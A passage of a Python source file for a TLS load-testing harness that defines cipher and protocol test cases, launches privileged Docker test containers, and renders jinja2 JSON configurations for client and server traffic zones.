'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '29.2',
'server_ip_prefix' : '119.2'
},
{'cipher_name' : 'ECDHE-RSA-AES128-GCM-SHA256',
'cipher' : '{ECDHE-RSA-AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '30.2',
'server_ip_prefix' : '120.2'
},
{'cipher_name' : 'ECDHE-RSA-AES256-GCM-SHA384',
'cipher' : '{ECDHE-RSA-AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '31.2',
'server_ip_prefix' : '121.2'
},
{'cipher_name' : 'ECDHE-RSA-AES128-SHA256',
'cipher' : '{ECDHE-RSA-AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '32.2',
'server_ip_prefix' : '122.2'
},
{'cipher_name' : 'ECDHE-RSA-AES256-SHA384',
'cipher' : '{ECDHE-RSA-AES256-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '33.2',
'server_ip_prefix' : '123.2'
},
{'cipher_name' : 'DHE-RSA-AES256-SHA256',
'cipher' : '{DHE-RSA-AES256-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '34.2',
'server_ip_prefix' : '124.2'
},
{'cipher_name' : 'DHE-RSA-AES256-GCM-SHA384',
'cipher' : '{DHE-RSA-AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '35.2',
'server_ip_prefix' : '125.2'
},
{'cipher_name' : 'ECDHE-RSA-CHACHA20-POLY1305',
'cipher' : '{ECDHE-RSA-CHACHA20-POLY1305}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '36.2',
'server_ip_prefix' : '126.2'
},
{'cipher_name' : 'TLS_AES_128_GCM_SHA256',
'cipher' : '{TLS_AES_128_GCM_SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : 0,
'tls1_3' : '{tls1_3}',
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '37.2',
'server_ip_prefix' : '139.2'
},
{'cipher_name' : 'TLS_AES_256_GCM_SHA384',
'cipher' : '{TLS_AES_256_GCM_SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : 0,
'tls1_3' : '{tls1_3}',
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '38.2',
'server_ip_prefix' : '128.2'
},
{'cipher_name' : 'TLS_CHACHA20_POLY1305_SHA256',
'cipher' : '{TLS_CHACHA20_POLY1305_SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : 0,
'tls1_3' : '{tls1_3}',
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '39.2',
'server_ip_prefix' : '129.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES128-GCM-SHA256',
'cipher' : '{ECDHE-ECDSA-AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '40.2',
'server_ip_prefix' : '130.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES256-GCM-SHA384',
'cipher' : '{ECDHE-ECDSA-AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '41.2',
'server_ip_prefix' : '131.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES128-SHA256',
'cipher' : '{ECDHE-ECDSA-AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '42.2',
'server_ip_prefix' : '132.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES256-SHA384',
'cipher' : '{ECDHE-ECDSA-AES256-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '43.2',
'server_ip_prefix' : '133.2'
},
{'cipher_name' : 'RC4-MD5',
'cipher' : '{RC4-MD5}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '44.2',
'server_ip_prefix' : '134.2'
},
{'cipher_name' : 'RC4-SHA',
'cipher' : '{RC4-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '45.2',
'server_ip_prefix' : '135.2'
},
{'cipher_name' : 'DES-CBC-SHA',
'cipher' : '{DES-CBC-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '46.2',
'server_ip_prefix' : '136.2'
},
{'cipher_name' : 'DES-CBC3-SHA',
'cipher' : '{DES-CBC3-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '47.2',
'server_ip_prefix' : '137.2'
},
{'cipher_name' : 'SEED-SHA',
'cipher' : '{SEED-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '48.2',
'server_ip_prefix' : '138.2'}
]
def start_containers(pod_info, c_args):
rundir_map = "--volume={}:{}".format (c_args.host_rundir
, c_args.target_rundir)
srcdir_map = "--volume={}:{}".format (c_args.host_srcdir
, c_args.target_srcdir)
for z_index in range( pod_info['containers']['count'] ):
zone_cname = "{}-zone-{}".format (c_args.pod, z_index+1)
cmd_str = "sudo docker run --cap-add=SYS_PTRACE --security-opt seccomp=unconfined --network=bridge --privileged --name {} -it -d {} {} tlspack/tgen:latest /bin/bash".format (zone_cname, rundir_map, srcdir_map)
os.system (cmd_str)
for network in pod_info['networks']:
host_iface = network['host_iface']
host_macvlan = network['host_macvlan']
cmd_str = "sudo ip link set dev {} up".format(host_iface)
os.system (cmd_str)
cmd_str = "sudo docker network connect {} {}".format(host_macvlan, zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} cp -f /rundir/bin/tlspack.exe /usr/local/bin".format(zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} chmod +x /usr/local/bin/tlspack.exe".format(zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} cp -f /rundir/bin/rpc_proxy_main.py /usr/local/bin".format(zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} chmod +x /usr/local/bin/rpc_proxy_main.py".format(zone_cname)
os.system (cmd_str)
cmd_str = "docker inspect --format='{{.NetworkSettings.IPAddress}}' " + zone_cname
zone_ipaddr = subprocess.check_output(cmd_str, shell=True, close_fds=True).strip()
cmd_str = "sudo docker exec -d {} python3 /usr/local/bin/rpc_proxy_main.py {} {}".format(zone_cname, zone_ipaddr, 8081)
os.system (cmd_str)
def stop_containers(pod_info, c_args):
for z_index in range( pod_info['containers']['count'] ):
zone_cname = "{}-zone-{}".format (c_args.pod, z_index+1)
cmd_str = "sudo docker rm -f {}".format (zone_cname)
os.system (cmd_str)
def restart_containers(pod_info, c_args):
stop_containers(pod_info, c_args)
start_containers(pod_info, c_args)
def add_traffic_params (arg_parser):
arg_parser.add_argument('--sysinit'
, action="store_true"
, default=False
, help = 'sysinit')
arg_parser.add_argument('--host_rundir'
, action="store"
, default='/root/rundir'
, help = 'rundir path')
arg_parser.add_argument('--target_rundir'
, action="store"
, default='/rundir'
, help = 'rundir path in container')
arg_parser.add_argument('--host_srcdir'
, action="store"
, default='/root/tcpdash'
, help = 'host_srcdir')
arg_parser.add_argument('--target_srcdir'
, action="store"
, default='/root/tcpdash'
, help = 'target_srcdir')
arg_parser.add_argument('--pod'
, action="store"
, required=True
, help = 'pod name')
arg_parser.add_argument('--runtag'
, action="store"
, required=True
, help = 'run id')
arg_parser.add_argument('--na'
, action="store"
, required=True
, dest='na_iface'
, help = 'na_iface name')
arg_parser.add_argument('--nb'
, action="store"
, required=True
, dest='nb_iface'
, help = 'nb_iface name')
arg_parser.add_argument('--cps'
, action="store"
, type=int
, required=True
, help = 'tps : 1 - 10000')
arg_parser.add_argument('--max_pipeline'
, action="store"
, type=int
, default=100
, help = 'max_pipeline : 1 - 10000')
arg_parser.add_argument('--max_active'
, action="store"
, type=int
, default=100
, help = 'max_active : 1 - 2000000')
arg_parser.add_argument('--cipher'
, action="store"
, help = 'command name'
, required=True)
arg_parser.add_argument('--sslv3'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1_1'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1_2'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1_3'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tcpdump'
, action="store"
, help = 'tcpdump options'
, default='-c 1000')
arg_parser.add_argument('--total_conn_count'
, action="store"
, type=int
, default=0
, help = 'total connection counts')
arg_parser.add_argument('--client_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:14:00')
arg_parser.add_argument('--server_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:15:00')
arg_parser.add_argument('--app_next_write'
, action="store"
, type=int
, default=0
, help = 'app_next_write')
arg_parser.add_argument('--app_cs_data_len'
, action="store"
, type=int
, default=128
, help = 'app_cs_data_len')
arg_parser.add_argument('--app_sc_data_len'
, action="store"
, type=int
, default=128
, help = 'app_sc_data_len')
arg_parser.add_argument('--app_rcv_buff'
, action="store"
, type=int
, default=0
, help = 'app_rcv_buff')
arg_parser.add_argument('--app_snd_buff'
, action="store"
, type=int
, default=0
, help = 'app_snd_buff')
arg_parser.add_argument('--tcp_rcv_buff'
, action="store"
, type=int
, default=0
, help = 'tcp_rcv_buff')
arg_parser.add_argument('--tcp_snd_buff'
, action="store"
, type=int
, default=0
, help = 'tcp_snd_buff')
arg_parser.add_argument('--app_cs_starttls_len'
, action="store"
, type=int
, default=0
, help = 'app_cs_starttls_len')
arg_parser.add_argument('--app_sc_starttls_len'
, action="store"
, type=int
, default=0
, help = 'app_sc_starttls_len')
arg_parser.add_argument('--port_begin'
, action="store"
, type=int
, default=5000
, help = 'app_sc_starttls_len')
def add_proxy_params (arg_parser):
arg_parser.add_argument('--sysinit'
, action="store_true"
, default=False
, help = 'sysinit')
arg_parser.add_argument('--host_rundir'
, action="store"
, default='/root/rundir'
, help = 'rundir path')
arg_parser.add_argument('--target_rundir'
, action="store"
, default='/rundir'
, help = 'rundir path in container')
arg_parser.add_argument('--host_srcdir'
, action="store"
, default='/root/tcpdash'
, help = 'host_srcdir')
arg_parser.add_argument('--target_srcdir'
, action="store"
, default='/root/tcpdash'
, help = 'target_srcdir')
arg_parser.add_argument('--pod'
, action="store"
, required=True
, help = 'pod name')
arg_parser.add_argument('--runtag'
, action="store"
, required=True
, help = 'run id')
arg_parser.add_argument('--proxy_traffic_vlan'
, action="store"
, type=int
, required=True
, help = '1-4095')
arg_parser.add_argument('--ta'
, action="store"
, required=True
, dest = 'ta_iface'
, help = 'ta host interface')
arg_parser.add_argument('--tb'
, action="store"
, required=True
, dest = 'tb_iface'
, help = 'tb host interface')
arg_parser.add_argument('--ta_macvlan'
, action="store"
, default=''
, help = 'ta host macvlan')
arg_parser.add_argument('--tb_macvlan'
, action="store"
, default=''
, help = 'tb host macvlan')
arg_parser.add_argument('--ta_iface_container'
, action="store"
, help = 'ta interface'
, default='eth1')
arg_parser.add_argument('--tb_iface_container'
, action="store"
, help = 'tb interface'
, default='eth2')
arg_parser.add_argument('--ta_subnet'
, action="store"
, help = 'ta subnet'
, required=True)
arg_parser.add_argument('--tb_subnet'
, action="store"
, help = 'tb subnet'
, required=True)
arg_parser.add_argument('--ta_tcpdump'
, action="store"
, help = 'ta tcpdump'
, default='-c 100')
arg_parser.add_argument('--tb_tcpdump'
, action="store"
, help = 'tb tcpdump'
, default='-c 100')
arg_parser.add_argument('--client_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:14:00')
arg_parser.add_argument('--server_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:15:00')
def add_stop_params (arg_parser):
arg_parser.add_argument('--host_rundir'
, action="store"
, default='/root/rundir'
, help = 'rundir path')
arg_parser.add_argument('--runtag'
, action="store"
, required=True
, help = 'run id')
arg_parser.add_argument('--force'
, action="store_true"
, default=False
, help = '0/1')
def zone_start_thread(pod_info, c_args, z_index):
zone_cname = "{}-zone-{}".format (c_args.pod, z_index+1)
cmd_str = "docker inspect --format='{{.NetworkSettings.IPAddress}}' " + zone_cname
zone_ipaddr = subprocess.check_output(cmd_str, shell=True, close_fds=True).strip()
cfg_file = os.path.join(c_args.target_rundir, 'traffic', c_args.runtag, 'config.json')
requests.post('http://{}:8081/start'.format(zone_ipaddr)
, data = json.dumps({'cfg_file':'/rundir/traffic/cps1/config.json'
, 'z_index' : z_index
, 'net_ifaces' : map (lambda n : n['container_iface'], pod_info['networks']) })
, headers={'Content-type': 'application/json', 'Accept': 'text/plain'})
def start_run(c_args, traffic_s):
registry_dir = os.path.join(c_args.host_rundir, 'registry')
registry_dir_pod = os.path.join(registry_dir, 'pods', c_args.pod)
registry_file_pod = os.path.join(registry_dir_pod, 'config.json')
registry_dir_run = os.path.join(registry_dir, 'runs', c_args.runtag)
registry_file_run = os.path.join(registry_dir_run, 'config.json')
if os.path.exists(registry_file_run):
with open (registry_file_run) as f:
registry_run_info = json.load(f)
print 'error: {} already running in pod {}'.format (c_args.runtag, registry_run_info['pod'])
sys.exit(1)
with open(registry_file_pod) as f:
pod_info = json.load(f)
if pod_info.get('runing'):
print 'error: {} pod in use running {}'.format(c_args.pod, pod_info['runing'])
sys.exit(1)
# create config dir; file
try:
cfg_j = json.loads (traffic_s)
traffic_s = json.dumps(cfg_j, indent=4)
except:
print traffic_s
sys.exit(1)
cfg_dir = os.path.join(c_args.host_rundir, 'traffic', c_args.runtag)
cfg_file = os.path.join(cfg_dir, 'config.json')
os.system ( 'rm -rf {}'.format(cfg_dir) )
os.system ( 'mkdir -p {}'.format(cfg_dir) )
os.system ( 'mkdir -p {}'.format(os.path.join(cfg_dir, 'pcaps')) )
os.system ( 'mkdir -p {}'.format(os.path.join(cfg_dir, 'stats')) )
os.system ( 'mkdir -p {}'.format(os.path.join(cfg_dir, 'logs')) )
with open(cfg_file, 'w') as f:
f.write(traffic_s)
if c_args.sysinit or not pod_info.get('ready', 0):
restart_containers (pod_info, c_args)
pod_info['ready'] = 1
time.sleep (5)
pod_info['runing'] = c_args.runtag
# create registry entries
os.system ('mkdir -p {}'.format(registry_dir_run))
with open(registry_file_run, 'w') as f:
json.dump({'pod' : c_args.pod}, f)
with open(registry_file_pod, 'w') as f:
json.dump(pod_info, f)
for next_step in range(1, 3):
z_threads = []
z_index = -1
for zone in cfg_j['zones']:
z_index += 1
if not zone['enable']:
continue
if zone.get('step', 1) == next_step:
thd = Thread(target=zone_start_thread, args=[pod_info, c_args, z_index])
thd.daemon = True
thd.start()
z_threads.append(thd)
if z_threads:
for thd in z_threads:
thd.join()
time.sleep(1)
def zone_stop_thread(pod_info, c_args, z_index):
zone_cname = "{}-zone-{}".format (c_args.pod, z_index+1)
cmd_str = "docker inspect --format='{{.NetworkSettings.IPAddress}}' " + zone_cname
zone_ipaddr = subprocess.check_output(cmd_str, shell=True, close_fds=True).strip()
requests.post('http://{}:8081/stop'.format(zone_ipaddr)
, data = json.dumps({'net_ifaces' : ['eth1', 'eth2' ] })
, headers={'Content-type': 'application/json', 'Accept': 'text/plain'})
def stop_run(pod_info, c_args):
registry_dir = os.path.join(c_args.host_rundir, 'registry')
registry_dir_pod = os.path.join(registry_dir, 'pods', c_args.pod)
registry_file_pod = os.path.join(registry_dir_pod, 'config.json')
registry_dir_run = os.path.join(registry_dir, 'runs', c_args.runtag)
registry_file_run = os.path.join(registry_dir_run, 'config.json')
if c_args.force:
stop_containers (pod_info, c_args)
pod_info['ready'] = 0
pod_info['runing'] = ''
with open(registry_file_pod, 'w') as f:
json.dump(pod_info, f)
os.system ( 'rm -rf {}'.format(registry_dir_run) )
sys.exit(1)
# check if config runing
if not os.path.exists(registry_dir_run):
print 'test {} not running'.format(pod_info['runing'])
sys.exit(1)
if not pod_info.get('runing'):
print 'no test running on pod {}'.format (c_args.pod)
sys.exit(1)
cfg_dir = os.path.join(c_args.host_rundir, 'traffic', pod_info['runing'])
cfg_file = os.path.join(cfg_dir, 'config.json')
try:
with open(cfg_file) as f:
cfg_j = json.load(f)
except:
print 'invalid config file'
sys.exit(1)
z_threads = []
z_index = -1
for zone in cfg_j['zones']:
z_index += 1
if not zone['enable']:
continue
thd = Thread(target=zone_stop_thread, args=[pod_info, c_args, z_index])
thd.daemon = True
thd.start()
z_threads.append(thd)
for thd in z_threads:
thd.join()
os.system ("rm -rf {}".format (registry_dir_run))
pod_info['ready'] = 1
pod_info['runing'] = ''
with open(registry_file_pod, 'w') as f:
json.dump(pod_info, f)
def add_cps_params (cmd_parser):
cmd_parser.add_argument('--ecdsa_cert'
, action="store_true"
, default=False
, help = '0/1')
def process_cps_template (c_args):
tlspack_cfg = jinja2.Template('''
{
"tgen_app" : "cps",
"zones" : [
{% set ns = namespace(cs_grp_count=0, srv_count=0) %}
{%- for traffic_id in range(1, PARAMS.traffic_paths+1) %}
{
"zone_label" : "zone-{{traffic_id}}-client",
"enable" : 1,
"step" : 2,
"app_list" : [
{
"app_type" : "tls_client",
"app_label" : "tls_client_1",
"enable" : 1,
"conn_per_sec" : {{PARAMS.cps}},
"max_pending_conn_count" : {{PARAMS.max_pipeline}},
"max_active_conn_count" : {{PARAMS.max_active}},
"total_conn_count" : {{PARAMS.total_conn_count}},
"cs_grp_list" : [
{% set ns.cs_grp_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.cs_grp_count }}
{% set ns.cs_grp_count = ns.cs_grp_count+1 %}
{
"cs_grp_label" : "cs_grp_{{loop.index}}",
"enable" : 1,
"srv_ip" : "14.2{{traffic_id}}.51.{{loop.index}}",
"srv_port" : 443,
"clnt_ip_begin" : "12.2{{traffic_id}}.51.{{1+loop.index0*10}}",
"clnt_ip_end" : "12.2{{traffic_id}}.51.{{loop.index*10}}",
"clnt_port_begin" : {{PARAMS.port_begin}},
"clnt_port_end" : 65000,
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.na_iface_container}} up",
"ifconfig {{PARAMS.na_iface_container}} hw ether {{PARAMS.client_mac_seed}}:{{'{:02x}'.format(traffic_id)}}",
"ip route add default dev {{PARAMS.na_iface_container}} table 200",
"ip -4 route add local 12.2{{traffic_id}}.51.0/24 dev lo",
"ip rule add from 12.2{{traffic_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.na_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-{{traffic_id}}-client.pcap &"
]
}
,
{
"zone_label" : "zone-{{traffic_id}}-server",
"enable" : 1,
"step" : 1,
"app_list" : [
{
"app_type" : "tls_server",
"app_label" : "tls_server_1",
"enable" : 1,
"srv_list" : [
{% set ns.srv_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.srv_count }}
{% set ns.srv_count = ns.srv_count+1 %}
{
"srv_label" : "srv_{{loop.index}}",
"enable" : 1,
"emulation_id" : 0,
"begin_cert_index" : {{traffic_id*2000}},
"end_cert_index" : 100000,
"srv_ip" : "14.2{{traffic_id}}.51.{{loop.index}}",
"srv_port" : 443,
"srv_cert" : "{{PARAMS.server_cert}}",
"srv_key" : "{{PARAMS.server_key}}",
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.nb_iface_container}} up",
"ifconfig {{PARAMS.nb_iface_container}} hw ether {{PARAMS.server_mac_seed}}:{{'{:02x}'.format(traffic_id)}}",
"ip route add default dev {{PARAMS.nb_iface_container}} table 200",
"ip -4 route add local 14.2{{traffic_id}}.51.0/24 dev lo",
"ip rule add from 14.2{{traffic_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.nb_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-{{traffic_id}}-server.pcap &"
]
}
{{ "," if not loop.last }}
{%- endfor %}
]
}
''')
if c_args.ecdsa_cert:
c_args.server_cert = '/rundir/certs/server2.cert'
c_args.server_key = '/rundir/certs/server2.key'
else:
c_args.server_cert = '/rundir/certs/server.cert'
c_args.server_key = '/rundir/certs/server.key'
return tlspack_cfg.render(PARAMS = c_args)
def add_bw_params (cmd_parser):
cmd_parser.add_argument('--ecdsa_cert'
, action="store_true"
, default=False
, help = '0/1')
def process_bw_template (c_args):
tlspack_cfg = jinja2.Template('''
{
"tgen_app" : "bw",
"zones" : [
{% set ns = namespace(cs_grp_count=0, srv_count=0) %}
{%- for traffic_id in range(1, PARAMS.traffic_paths+1) %}
{
"zone_label" : "zone-{{traffic_id}}-client",
"enable" : 1,
"app_list" : [
{
"app_type" : "tls_client",
"app_label" : "tls_client_1",
"enable" : 1,
"conn_per_sec" : {{PARAMS.cps}},
"max_pending_conn_count" : {{PARAMS.max_pipeline}},
"max_active_conn_count" : {{PARAMS.max_active}},
"total_conn_count" : {{PARAMS.total_conn_count}},
"cs_grp_list" : [
{% set ns.cs_grp_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.cs_grp_count }}
{% set ns.cs_grp_count = ns.cs_grp_count+1 %}
{
"cs_grp_label" : "cs_grp_{{loop.index}}",
"enable" : 1,
"srv_ip" : "24.2{{traffic_id}}.51.{{loop.index}}",
"srv_port" : 443,
"clnt_ip_begin" : "22.2{{traffic_id}}.51.{{1+loop.index0*10}}",
"clnt_ip_end" : "22.2{{traffic_id}}.51.{{loop.index*10}}",
"clnt_port_begin" : {{PARAMS.port_begin}},
"clnt_port_end" : 65000,
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "reset",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.na_iface_container}} up",
"ifconfig {{PARAMS.na_iface_container}} hw ether {{PARAMS.client_mac_seed}}:{{'{:02x}'.format(traffic_id)}}",
"ip route add default dev {{PARAMS.na_iface_container}} table 200",
"ip -4 route add local 22.2{{traffic_id}}.51.0/24 dev lo",
"ip rule add from 22.2{{traffic_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.na_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-{{traffic_id}}-client.pcap &"
]
}
,
{
"zone_label" : "zone-{{traffic_id}}-server",
"enable" : 1,
"app_list" : [
{
"app_type" : "tls_server",
"app_label" : "tls_server_1",
"enable" : 1,
"srv_list" : [
{% set ns.srv_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.srv_count }}
{% set ns.srv_count = ns.srv_count+1 %}
{
"srv_label" : "srv_{{loop.index}}",
"enable" : 1,
"srv_ip" : "24.2{{traffic_id}}.51.{{loop.index}}",
"srv_port" : 443,
"srv_cert" : "{{PARAMS.server_cert}}",
"srv_key" : "{{PARAMS.server_key}}",
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "reset",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
